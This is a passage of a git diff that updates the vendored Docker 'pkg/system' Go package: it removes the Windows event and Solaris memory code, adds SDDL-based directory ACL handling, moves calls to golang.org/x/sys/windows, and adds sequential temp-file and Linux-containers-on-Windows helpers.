diff --git a/vendor/github.com/docker/docker/pkg/system/events_windows.go b/vendor/github.com/docker/docker/pkg/system/events_windows.go
deleted file mode 100644
index 3ec6d22151..0000000000
--- a/vendor/github.com/docker/docker/pkg/system/events_windows.go
+++ /dev/null
@@ -1,85 +0,0 @@
-package system
-
-// This file implements syscalls for Win32 events which are not implemented
-// in golang.
-
-import (
-	"syscall"
-	"unsafe"
-
-	"golang.org/x/sys/windows"
-)
-
-var (
-	procCreateEvent = modkernel32.NewProc("CreateEventW")
-	procOpenEvent   = modkernel32.NewProc("OpenEventW")
-	procSetEvent    = modkernel32.NewProc("SetEvent")
-	procResetEvent  = modkernel32.NewProc("ResetEvent")
-	procPulseEvent  = modkernel32.NewProc("PulseEvent")
-)
-
-// CreateEvent implements win32 CreateEventW func in golang. It will create an event object.
-func CreateEvent(eventAttributes *syscall.SecurityAttributes, manualReset bool, initialState bool, name string) (handle syscall.Handle, err error) {
-	namep, _ := syscall.UTF16PtrFromString(name)
-	var _p1 uint32
-	if manualReset {
-		_p1 = 1
-	}
-	var _p2 uint32
-	if initialState {
-		_p2 = 1
-	}
-	r0, _, e1 := procCreateEvent.Call(uintptr(unsafe.Pointer(eventAttributes)), uintptr(_p1), uintptr(_p2), uintptr(unsafe.Pointer(namep)))
-	use(unsafe.Pointer(namep))
-	handle = syscall.Handle(r0)
-	if handle == syscall.InvalidHandle {
-		err = e1
-	}
-	return
-}
-
-// OpenEvent implements win32 OpenEventW func in golang. It opens an event object.
-func OpenEvent(desiredAccess uint32, inheritHandle bool, name string) (handle syscall.Handle, err error) {
-	namep, _ := syscall.UTF16PtrFromString(name)
-	var _p1 uint32
-	if inheritHandle {
-		_p1 = 1
-	}
-	r0, _, e1 := procOpenEvent.Call(uintptr(desiredAccess), uintptr(_p1), uintptr(unsafe.Pointer(namep)))
-	use(unsafe.Pointer(namep))
-	handle = syscall.Handle(r0)
-	if handle == syscall.InvalidHandle {
-		err = e1
-	}
-	return
-}
-
-// SetEvent implements win32 SetEvent func in golang.
-func SetEvent(handle syscall.Handle) (err error) {
-	return setResetPulse(handle, procSetEvent)
-}
-
-// ResetEvent implements win32 ResetEvent func in golang.
-func ResetEvent(handle syscall.Handle) (err error) {
-	return setResetPulse(handle, procResetEvent)
-}
-
-// PulseEvent implements win32 PulseEvent func in golang.
-func PulseEvent(handle syscall.Handle) (err error) {
-	return setResetPulse(handle, procPulseEvent)
-}
-
-func setResetPulse(handle syscall.Handle, proc *windows.LazyProc) (err error) {
-	r0, _, _ := proc.Call(uintptr(handle))
-	if r0 != 0 {
-		err = syscall.Errno(r0)
-	}
-	return
-}
-
-var temp unsafe.Pointer
-
-// use ensures a variable is kept alive without the GC freeing while still needed
-func use(p unsafe.Pointer) {
-	temp = p
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/exitcode.go b/vendor/github.com/docker/docker/pkg/system/exitcode.go
index 60f0514b1d..4ba8fe35bf 100644
--- a/vendor/github.com/docker/docker/pkg/system/exitcode.go
+++ b/vendor/github.com/docker/docker/pkg/system/exitcode.go
@@ -1,4 +1,4 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"fmt"
@@ -17,17 +17,3 @@ func GetExitCode(err error) (int, error) {
 	}
 	return exitCode, fmt.Errorf("failed to get exit code")
 }
-
-// ProcessExitCode process the specified error and returns the exit status code
-// if the error was of type exec.ExitError, returns nothing otherwise.
-func ProcessExitCode(err error) (exitCode int) {
-	if err != nil {
-		var exiterr error
-		if exitCode, exiterr = GetExitCode(err); exiterr != nil {
-			// TODO: Fix this so we check the error's text.
-			// we've failed to retrieve exit code, so we set it to 127
-			exitCode = 127
-		}
-	}
-	return
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/filesys.go b/vendor/github.com/docker/docker/pkg/system/filesys.go
index 810c794786..adeb163052 100644
--- a/vendor/github.com/docker/docker/pkg/system/filesys.go
+++ b/vendor/github.com/docker/docker/pkg/system/filesys.go
@@ -1,21 +1,21 @@
 // +build !windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
+	"io/ioutil"
 	"os"
 	"path/filepath"
 )
 
-// MkdirAllWithACL is a wrapper for MkdirAll that creates a directory
-// ACL'd for Builtin Administrators and Local System.
-func MkdirAllWithACL(path string, perm os.FileMode) error {
-	return MkdirAll(path, perm)
+// MkdirAllWithACL is a wrapper for MkdirAll on unix systems.
+func MkdirAllWithACL(path string, perm os.FileMode, sddl string) error {
+	return MkdirAll(path, perm, sddl)
 }
 
 // MkdirAll creates a directory named path along with any necessary parents,
 // with permission specified by attribute perm for all dir created.
-func MkdirAll(path string, perm os.FileMode) error {
+func MkdirAll(path string, perm os.FileMode, sddl string) error {
 	return os.MkdirAll(path, perm)
 }
 
@@ -24,7 +24,7 @@ func IsAbs(path string) bool {
 	return filepath.IsAbs(path)
 }
 
-// The functions below here are wrappers for the equivalents in the os package.
+// The functions below here are wrappers for the equivalents in the os and ioutils packages.
 // They are passthrough on Unix platforms, and only relevant on Windows.
 
 // CreateSequential creates the named file with mode 0666 (before umask), truncating
@@ -52,3 +52,16 @@ func OpenSequential(name string) (*os.File, error) {
 func OpenFileSequential(name string, flag int, perm os.FileMode) (*os.File, error) {
 	return os.OpenFile(name, flag, perm)
 }
+
+// TempFileSequential creates a new temporary file in the directory dir
+// with a name beginning with prefix, opens the file for reading
+// and writing, and returns the resulting *os.File.
+// If dir is the empty string, TempFile uses the default directory
+// for temporary files (see os.TempDir).
+// Multiple programs calling TempFile simultaneously
+// will not choose the same file. The caller can use f.Name()
+// to find the pathname of the file. It is the caller's responsibility
+// to remove the file when no longer needed.
+func TempFileSequential(dir, prefix string) (f *os.File, err error) {
+	return ioutil.TempFile(dir, prefix)
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go
index 6094f01fd4..a1f6013f13 100644
--- a/vendor/github.com/docker/docker/pkg/system/filesys_windows.go
+++ b/vendor/github.com/docker/docker/pkg/system/filesys_windows.go
@@ -1,33 +1,42 @@
-// +build windows
-
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"os"
 	"path/filepath"
 	"regexp"
+	"strconv"
 	"strings"
+	"sync"
 	"syscall"
+	"time"
 	"unsafe"
 
 	winio "github.com/Microsoft/go-winio"
+	"golang.org/x/sys/windows"
+)
+
+const (
+	// SddlAdministratorsLocalSystem is local administrators plus NT AUTHORITY\System
+	SddlAdministratorsLocalSystem = "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)"
+	// SddlNtvmAdministratorsLocalSystem is NT VIRTUAL MACHINE\Virtual Machines plus local administrators plus NT AUTHORITY\System
+	SddlNtvmAdministratorsLocalSystem = "D:P(A;OICI;GA;;;S-1-5-83-0)(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)"
 )
 
 // MkdirAllWithACL is a wrapper for MkdirAll that creates a directory
-// ACL'd for Builtin Administrators and Local System.
-func MkdirAllWithACL(path string, perm os.FileMode) error {
-	return mkdirall(path, true)
+// with an appropriate SDDL defined ACL.
+func MkdirAllWithACL(path string, perm os.FileMode, sddl string) error {
+	return mkdirall(path, true, sddl)
 }
 
 // MkdirAll implementation that is volume path aware for Windows.
-func MkdirAll(path string, _ os.FileMode) error {
-	return mkdirall(path, false)
+func MkdirAll(path string, _ os.FileMode, sddl string) error {
+	return mkdirall(path, false, sddl)
 }
 
 // mkdirall is a custom version of os.MkdirAll modified for use on Windows
 // so that it is both volume path aware, and can create a directory with
 // a DACL.
-func mkdirall(path string, adminAndLocalSystem bool) error {
+func mkdirall(path string, applyACL bool, sddl string) error {
 	if re := regexp.MustCompile(`^\\\\\?\\Volume{[a-z0-9-]+}$`); re.MatchString(path) {
 		return nil
 	}
@@ -61,15 +70,15 @@ func mkdirall(path string, adminAndLocalSystem bool) error {
 
 	if j > 1 {
 		// Create parent
-		err = mkdirall(path[0:j-1], false)
+		err = mkdirall(path[0:j-1], false, sddl)
 		if err != nil {
 			return err
 		}
 	}
 
 	// Parent now exists; invoke os.Mkdir or mkdirWithACL and use its result.
-	if adminAndLocalSystem {
-		err = mkdirWithACL(path)
+	if applyACL {
+		err = mkdirWithACL(path, sddl)
 	} else {
 		err = os.Mkdir(path, 0)
 	}
@@ -89,13 +98,12 @@ func mkdirall(path string, adminAndLocalSystem bool) error {
 // mkdirWithACL creates a new directory. If there is an error, it will be of
 // type *PathError. .
 //
-// This is a modified and combined version of os.Mkdir and syscall.Mkdir
+// This is a modified and combined version of os.Mkdir and windows.Mkdir
 // in golang to cater for creating a directory am ACL permitting full
 // access, with inheritance, to any subfolder/file for Built-in Administrators
 // and Local System.
-func mkdirWithACL(name string) error {
-	sa := syscall.SecurityAttributes{Length: 0}
-	sddl := "D:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)"
+func mkdirWithACL(name string, sddl string) error {
+	sa := windows.SecurityAttributes{Length: 0}
 	sd, err := winio.SddlToSecurityDescriptor(sddl)
 	if err != nil {
 		return &os.PathError{Op: "mkdir", Path: name, Err: err}
@@ -104,12 +112,12 @@ func mkdirWithACL(name string) error {
 	sa.InheritHandle = 1
 	sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0]))
 
-	namep, err := syscall.UTF16PtrFromString(name)
+	namep, err := windows.UTF16PtrFromString(name)
 	if err != nil {
 		return &os.PathError{Op: "mkdir", Path: name, Err: err}
 	}
 
-	e := syscall.CreateDirectory(namep, &sa)
+	e := windows.CreateDirectory(namep, &sa)
 	if e != nil {
 		return &os.PathError{Op: "mkdir", Path: name, Err: e}
 	}
@@ -132,7 +140,7 @@ func IsAbs(path string) bool {
 	return true
 }
 
-// The origin of the functions below here are the golang OS and syscall packages,
+// The origin of the functions below here are the golang OS and windows packages,
 // slightly modified to only cope with files, not directories due to the
 // specific use case.
 //
@@ -164,73 +172,125 @@ func OpenFileSequential(name string, flag int, _ os.FileMode) (*os.File, error)
 	if name == "" {
 		return nil, &os.PathError{Op: "open", Path: name, Err: syscall.ENOENT}
 	}
-	r, errf := syscallOpenFileSequential(name, flag, 0)
+	r, errf := windowsOpenFileSequential(name, flag, 0)
 	if errf == nil {
 		return r, nil
 	}
 	return nil, &os.PathError{Op: "open", Path: name, Err: errf}
 }
 
-func syscallOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) {
-	r, e := syscallOpenSequential(name, flag|syscall.O_CLOEXEC, 0)
+func windowsOpenFileSequential(name string, flag int, _ os.FileMode) (file *os.File, err error) {
+	r, e := windowsOpenSequential(name, flag|windows.O_CLOEXEC, 0)
 	if e != nil {
 		return nil, e
 	}
 	return os.NewFile(uintptr(r), name), nil
 }
 
-func makeInheritSa() *syscall.SecurityAttributes {
-	var sa syscall.SecurityAttributes
+func makeInheritSa() *windows.SecurityAttributes {
+	var sa windows.SecurityAttributes
 	sa.Length = uint32(unsafe.Sizeof(sa))
 	sa.InheritHandle = 1
 	return &sa
 }
 
-func syscallOpenSequential(path string, mode int, _ uint32) (fd syscall.Handle, err error) {
+func windowsOpenSequential(path string, mode int, _ uint32) (fd windows.Handle, err error) {
 	if len(path) == 0 {
-		return syscall.InvalidHandle, syscall.ERROR_FILE_NOT_FOUND
+		return windows.InvalidHandle, windows.ERROR_FILE_NOT_FOUND
 	}
-	pathp, err := syscall.UTF16PtrFromString(path)
+	pathp, err := windows.UTF16PtrFromString(path)
 	if err != nil {
-		return syscall.InvalidHandle, err
+		return windows.InvalidHandle, err
 	}
 	var access uint32
-	switch mode & (syscall.O_RDONLY | syscall.O_WRONLY | syscall.O_RDWR) {
-	case syscall.O_RDONLY:
-		access = syscall.GENERIC_READ
-	case syscall.O_WRONLY:
-		access = syscall.GENERIC_WRITE
-	case syscall.O_RDWR:
-		access = syscall.GENERIC_READ | syscall.GENERIC_WRITE
-	}
-	if mode&syscall.O_CREAT != 0 {
-		access |= syscall.GENERIC_WRITE
-	}
-	if mode&syscall.O_APPEND != 0 {
-		access &^= syscall.GENERIC_WRITE
-		access |= syscall.FILE_APPEND_DATA
-	}
-	sharemode := uint32(syscall.FILE_SHARE_READ | syscall.FILE_SHARE_WRITE)
-	var sa *syscall.SecurityAttributes
-	if mode&syscall.O_CLOEXEC == 0 {
+	switch mode & (windows.O_RDONLY | windows.O_WRONLY | windows.O_RDWR) {
+	case windows.O_RDONLY:
+		access = windows.GENERIC_READ
+	case windows.O_WRONLY:
+		access = windows.GENERIC_WRITE
+	case windows.O_RDWR:
+		access = windows.GENERIC_READ | windows.GENERIC_WRITE
+	}
+	if mode&windows.O_CREAT != 0 {
+		access |= windows.GENERIC_WRITE
+	}
+	if mode&windows.O_APPEND != 0 {
+		access &^= windows.GENERIC_WRITE
+		access |= windows.FILE_APPEND_DATA
+	}
+	sharemode := uint32(windows.FILE_SHARE_READ | windows.FILE_SHARE_WRITE)
+	var sa *windows.SecurityAttributes
+	if mode&windows.O_CLOEXEC == 0 {
 		sa = makeInheritSa()
 	}
 	var createmode uint32
 	switch {
-	case mode&(syscall.O_CREAT|syscall.O_EXCL) == (syscall.O_CREAT | syscall.O_EXCL):
-		createmode = syscall.CREATE_NEW
-	case mode&(syscall.O_CREAT|syscall.O_TRUNC) == (syscall.O_CREAT | syscall.O_TRUNC):
-		createmode = syscall.CREATE_ALWAYS
-	case mode&syscall.O_CREAT == syscall.O_CREAT:
-		createmode = syscall.OPEN_ALWAYS
-	case mode&syscall.O_TRUNC == syscall.O_TRUNC:
-		createmode = syscall.TRUNCATE_EXISTING
+	case mode&(windows.O_CREAT|windows.O_EXCL) == (windows.O_CREAT | windows.O_EXCL):
+		createmode = windows.CREATE_NEW
+	case mode&(windows.O_CREAT|windows.O_TRUNC) == (windows.O_CREAT | windows.O_TRUNC):
+		createmode = windows.CREATE_ALWAYS
+	case mode&windows.O_CREAT == windows.O_CREAT:
+		createmode = windows.OPEN_ALWAYS
+	case mode&windows.O_TRUNC == windows.O_TRUNC:
+		createmode = windows.TRUNCATE_EXISTING
 	default:
-		createmode = syscall.OPEN_EXISTING
+		createmode = windows.OPEN_EXISTING
 	}
 	// Use FILE_FLAG_SEQUENTIAL_SCAN rather than FILE_ATTRIBUTE_NORMAL as implemented in golang.
 	//https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
 	const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN
-	h, e := syscall.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0)
+	h, e := windows.CreateFile(pathp, access, sharemode, sa, createmode, fileFlagSequentialScan, 0)
 	return h, e
 }
+
+// Helpers for TempFileSequential
+var rand uint32
+var randmu sync.Mutex
+
+func reseed() uint32 {
+	return uint32(time.Now().UnixNano() + int64(os.Getpid()))
+}
+func nextSuffix() string {
+	randmu.Lock()
+	r := rand
+	if r == 0 {
+		r = reseed()
+	}
+	r = r*1664525 + 1013904223 // constants from Numerical Recipes
+	rand = r
+	randmu.Unlock()
+	return strconv.Itoa(int(1e9 + r%1e9))[1:]
+}
+
+// TempFileSequential is a copy of ioutil.TempFile, modified to use sequential
+// file access. Below is the original comment from golang:
+// TempFile creates a new temporary file in the directory dir
+// with a name beginning with prefix, opens the file for reading
+// and writing, and returns the resulting *os.File.
+// If dir is the empty string, TempFile uses the default directory
+// for temporary files (see os.TempDir).
+// Multiple programs calling TempFile simultaneously
+// will not choose the same file. The caller can use f.Name()
+// to find the pathname of the file. It is the caller's responsibility
+// to remove the file when no longer needed.
+func TempFileSequential(dir, prefix string) (f *os.File, err error) {
+	if dir == "" {
+		dir = os.TempDir()
+	}
+
+	nconflict := 0
+	for i := 0; i < 10000; i++ {
+		name := filepath.Join(dir, prefix+nextSuffix())
+		f, err = OpenFileSequential(name, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600)
+		if os.IsExist(err) {
+			if nconflict++; nconflict > 10 {
+				randmu.Lock()
+				rand = reseed()
+				randmu.Unlock()
+			}
+			continue
+		}
+		break
+	}
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/init.go b/vendor/github.com/docker/docker/pkg/system/init.go
new file mode 100644
index 0000000000..a17597aaba
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/init.go
@@ -0,0 +1,22 @@
+package system // import "github.com/docker/docker/pkg/system"
+
+import (
+	"syscall"
+	"time"
+	"unsafe"
+)
+
+// Used by chtimes
+var maxTime time.Time
+
+func init() {
+	// chtimes initialization
+	if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 {
+		// This is a 64 bit timespec
+		// os.Chtimes limits time to the following
+		maxTime = time.Unix(0, 1<<63-1)
+	} else {
+		// This is a 32 bit timespec
+		maxTime = time.Unix(1<<31-1, 0)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/init_unix.go b/vendor/github.com/docker/docker/pkg/system/init_unix.go
new file mode 100644
index 0000000000..4996a67c12
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/init_unix.go
@@ -0,0 +1,7 @@
+// +build !windows
+
+package system // import "github.com/docker/docker/pkg/system"
+
+// InitLCOW does nothing since LCOW is a windows only feature
+func InitLCOW(experimental bool) {
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/init_windows.go b/vendor/github.com/docker/docker/pkg/system/init_windows.go
new file mode 100644
index 0000000000..4910ff69d6
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/init_windows.go
@@ -0,0 +1,12 @@
+package system // import "github.com/docker/docker/pkg/system"
+
+// lcowSupported determines if Linux Containers on Windows are supported.
+var lcowSupported = false
+
+// InitLCOW sets whether LCOW is supported or not
+func InitLCOW(experimental bool) {
+	v := GetOSVersion()
+	if experimental && v.Build >= 16299 {
+		lcowSupported = true
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/lcow.go b/vendor/github.com/docker/docker/pkg/system/lcow.go
new file mode 100644
index 0000000000..5c3fbfe6f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/lcow.go
@@ -0,0 +1,69 @@
+package system // import "github.com/docker/docker/pkg/system"
+
+import (
+	"fmt"
+	"runtime"
+	"strings"
+
+	specs "github.com/opencontainers/image-spec/specs-go/v1"
+)
+
+// ValidatePlatform determines if a platform structure is valid.
+// TODO This is a temporary function - can be replaced by parsing from
+// https://github.com/containerd/containerd/pull/1403/files at a later date.
+// @jhowardmsft
+func ValidatePlatform(platform *specs.Platform) error {
+	platform.Architecture = strings.ToLower(platform.Architecture)
+	platform.OS = strings.ToLower(platform.OS)
+	// Based on https://github.com/moby/moby/pull/34642#issuecomment-330375350, do
+	// not support anything except operating system.
+	if platform.Architecture != "" {
+		return fmt.Errorf("invalid platform architecture %q", platform.Architecture)
+	}
+	if platform.OS != "" {
+		if !(platform.OS == runtime.GOOS || (LCOWSupported() && platform.OS == "linux")) {
+			return fmt.Errorf("invalid platform os %q", platform.OS)
+		}
+	}
+	if len(platform.OSFeatures) != 0 {
+		return fmt.Errorf("invalid platform osfeatures %q", platform.OSFeatures)
+	}
+	if platform.OSVersion != "" {
+		return fmt.Errorf("invalid platform osversion %q", platform.OSVersion)
+	}
+	if platform.Variant != "" {
+		return fmt.Errorf("invalid platform variant %q", platform.Variant)
+	}
+	return nil
+}
+
+// ParsePlatform parses a platform string in the format os[/arch[/variant]
+// into an OCI image-spec platform structure.
+// TODO This is a temporary function - can be replaced by parsing from
+// https://github.com/containerd/containerd/pull/1403/files at a later date.
+// @jhowardmsft
+func ParsePlatform(in string) *specs.Platform {
+	p := &specs.Platform{}
+	elements := strings.SplitN(strings.ToLower(in), "/", 3)
+	if len(elements) == 3 {
+		p.Variant = elements[2]
+	}
+	if len(elements) >= 2 {
+		p.Architecture = elements[1]
+	}
+	if len(elements) >= 1 {
+		p.OS = elements[0]
+	}
+	return p
+}
+
+// IsOSSupported determines if an operating system is supported by the host
+func IsOSSupported(os string) bool {
+	if runtime.GOOS == os {
+		return true
+	}
+	if LCOWSupported() && os == "linux" {
+		return true
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/lcow_unix.go b/vendor/github.com/docker/docker/pkg/system/lcow_unix.go
new file mode 100644
index 0000000000..26397fb8a1
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/lcow_unix.go
@@ -0,0 +1,8 @@
+// +build !windows
+
+package system // import "github.com/docker/docker/pkg/system"
+
+// LCOWSupported returns true if Linux containers on Windows are supported.
+func LCOWSupported() bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/lcow_windows.go b/vendor/github.com/docker/docker/pkg/system/lcow_windows.go
new file mode 100644
index 0000000000..f0139df8f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/lcow_windows.go
@@ -0,0 +1,6 @@
+package system // import "github.com/docker/docker/pkg/system"
+
+// LCOWSupported returns true if Linux containers on Windows are supported.
+func LCOWSupported() bool {
+	return lcowSupported
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/lstat.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix.go
similarity index 84%
rename from vendor/github.com/docker/docker/pkg/system/lstat.go
rename to vendor/github.com/docker/docker/pkg/system/lstat_unix.go
index bd23c4d50b..7477995f1b 100644
--- a/vendor/github.com/docker/docker/pkg/system/lstat.go
+++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"syscall"
diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go
index 062cf53bfe..9fb4a191cf 100644
--- a/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go
@@ -1,6 +1,6 @@
 // +build linux freebsd
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"os"
diff --git a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go
index 49e87eb40b..359c791d9b 100644
--- a/vendor/github.com/docker/docker/pkg/system/lstat_windows.go
+++ b/vendor/github.com/docker/docker/pkg/system/lstat_windows.go
@@ -1,25 +1,14 @@
-// +build windows
+package system // import "github.com/docker/docker/pkg/system"
 
-package system
-
-import (
-	"os"
-)
+import "os"
 
 // Lstat calls os.Lstat to get a fileinfo interface back.
 // This is then copied into our own locally defined structure.
-// Note the Linux version uses fromStatT to do the copy back,
-// but that not strictly necessary when already in an OS specific module.
 func Lstat(path string) (*StatT, error) {
 	fi, err := os.Lstat(path)
 	if err != nil {
 		return nil, err
 	}
 
-	return &StatT{
-		name:    fi.Name(),
-		size:    fi.Size(),
-		mode:    fi.Mode(),
-		modTime: fi.ModTime(),
-		isDir:   fi.IsDir()}, nil
+	return fromStatT(&fi)
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo.go b/vendor/github.com/docker/docker/pkg/system/meminfo.go
index 3b6e947e67..6667eb84dc 100644
--- a/vendor/github.com/docker/docker/pkg/system/meminfo.go
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo.go
@@ -1,4 +1,4 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 // MemInfo contains memory statistics of the host system.
 type MemInfo struct {
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go
index 385f1d5e73..d79e8b0765 100644
--- a/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_linux.go
@@ -1,4 +1,4 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"bufio"
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go b/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go
deleted file mode 100644
index 7f4f84f73a..0000000000
--- a/vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go
+++ /dev/null
@@ -1,128 +0,0 @@
-// +build solaris,cgo
-
-package system
-
-import (
-	"fmt"
-	"unsafe"
-)
-
-// #cgo LDFLAGS: -lkstat
-// #include <unistd.h>
-// #include <stdlib.h>
-// #include <stdio.h>
-// #include <kstat.h>
-// #include <sys/swap.h>
-// #include <sys/param.h>
-// struct swaptable *allocSwaptable(int num) {
-//	struct swaptable *st;
-//	struct swapent *swapent;
-// 	st = (struct swaptable *)malloc(num * sizeof(swapent_t) + sizeof (int));
-//	swapent = st->swt_ent;
-//	for (int i = 0; i < num; i++,swapent++) {
-//		swapent->ste_path = (char *)malloc(MAXPATHLEN * sizeof (char));
-//	}
-//	st->swt_n = num;
-//	return st;
-//}
-// void freeSwaptable (struct swaptable *st) {
-//	struct swapent *swapent = st->swt_ent;
-//	for (int i = 0; i < st->swt_n; i++,swapent++) {
-//		free(swapent->ste_path);
-//	}
-//	free(st);
-// }
-// swapent_t getSwapEnt(swapent_t *ent, int i) {
-//	return ent[i];
-// }
-// int64_t getPpKernel() {
-//	int64_t pp_kernel = 0;
-//	kstat_ctl_t *ksc;
-//	kstat_t *ks;
-//	kstat_named_t *knp;
-//	kid_t kid;
-//
-//	if ((ksc = kstat_open()) == NULL) {
-//		return -1;
-//	}
-//	if ((ks = kstat_lookup(ksc, "unix", 0, "system_pages")) == NULL) {
-//		return -1;
-//	}
-//	if (((kid = kstat_read(ksc, ks, NULL)) == -1) ||
-//	    ((knp = kstat_data_lookup(ks, "pp_kernel")) == NULL)) {
-//		return -1;
-//	}
-//	switch (knp->data_type) {
-//	case KSTAT_DATA_UINT64:
-//		pp_kernel = knp->value.ui64;
-//		break;
-//	case KSTAT_DATA_UINT32:
-//		pp_kernel = knp->value.ui32;
-//		break;
-//	}
-//	pp_kernel *= sysconf(_SC_PAGESIZE);
-//	return (pp_kernel > 0 ? pp_kernel : -1);
-// }
-import "C"
-
-// Get the system memory info using sysconf same as prtconf
-func getTotalMem() int64 {
-	pagesize := C.sysconf(C._SC_PAGESIZE)
-	npages := C.sysconf(C._SC_PHYS_PAGES)
-	return int64(pagesize * npages)
-}
-
-func getFreeMem() int64 {
-	pagesize := C.sysconf(C._SC_PAGESIZE)
-	npages := C.sysconf(C._SC_AVPHYS_PAGES)
-	return int64(pagesize * npages)
-}
-
-// ReadMemInfo retrieves memory statistics of the host system and returns a
-//  MemInfo type.
-func ReadMemInfo() (*MemInfo, error) {
-
-	ppKernel := C.getPpKernel()
-	MemTotal := getTotalMem()
-	MemFree := getFreeMem()
-	SwapTotal, SwapFree, err := getSysSwap()
-
-	if ppKernel < 0 || MemTotal < 0 || MemFree < 0 || SwapTotal < 0 ||
-		SwapFree < 0 {
-		return nil, fmt.Errorf("error getting system memory info %v\n", err)
-	}
-
-	meminfo := &MemInfo{}
-	// Total memory is total physical memory less than memory locked by kernel
-	meminfo.MemTotal = MemTotal - int64(ppKernel)
-	meminfo.MemFree = MemFree
-	meminfo.SwapTotal = SwapTotal
-	meminfo.SwapFree = SwapFree
-
-	return meminfo, nil
-}
-
-func getSysSwap() (int64, int64, error) {
-	var tSwap int64
-	var fSwap int64
-	var diskblksPerPage int64
-	num, err := C.swapctl(C.SC_GETNSWP, nil)
-	if err != nil {
-		return -1, -1, err
-	}
-	st := C.allocSwaptable(num)
-	_, err = C.swapctl(C.SC_LIST, unsafe.Pointer(st))
-	if err != nil {
-		C.freeSwaptable(st)
-		return -1, -1, err
-	}
-
-	diskblksPerPage = int64(C.sysconf(C._SC_PAGESIZE) >> C.DEV_BSHIFT)
-	for i := 0; i < int(num); i++ {
-		swapent := C.getSwapEnt(&st.swt_ent[0], C.int(i))
-		tSwap += int64(swapent.ste_pages) * diskblksPerPage
-		fSwap += int64(swapent.ste_free) * diskblksPerPage
-	}
-	C.freeSwaptable(st)
-	return tSwap, fSwap, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go
index 44f5562882..c3690d6311 100644
--- a/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go
@@ -1,6 +1,6 @@
 // +build linux freebsd
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"strings"
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go
index 3ce019dffd..56f4494268 100644
--- a/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go
@@ -1,6 +1,6 @@
-// +build !linux,!windows,!solaris
+// +build !linux,!windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 // ReadMemInfo is not supported on platforms other than linux and windows.
 func ReadMemInfo() (*MemInfo, error) {
diff --git a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go
index 883944a4c5..6ed93f2fe2 100644
--- a/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go
+++ b/vendor/github.com/docker/docker/pkg/system/meminfo_windows.go
@@ -1,4 +1,4 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"unsafe"
diff --git a/vendor/github.com/docker/docker/pkg/system/mknod.go b/vendor/github.com/docker/docker/pkg/system/mknod.go
index 73958182b4..b132482e03 100644
--- a/vendor/github.com/docker/docker/pkg/system/mknod.go
+++ b/vendor/github.com/docker/docker/pkg/system/mknod.go
@@ -1,15 +1,15 @@
 // +build !windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
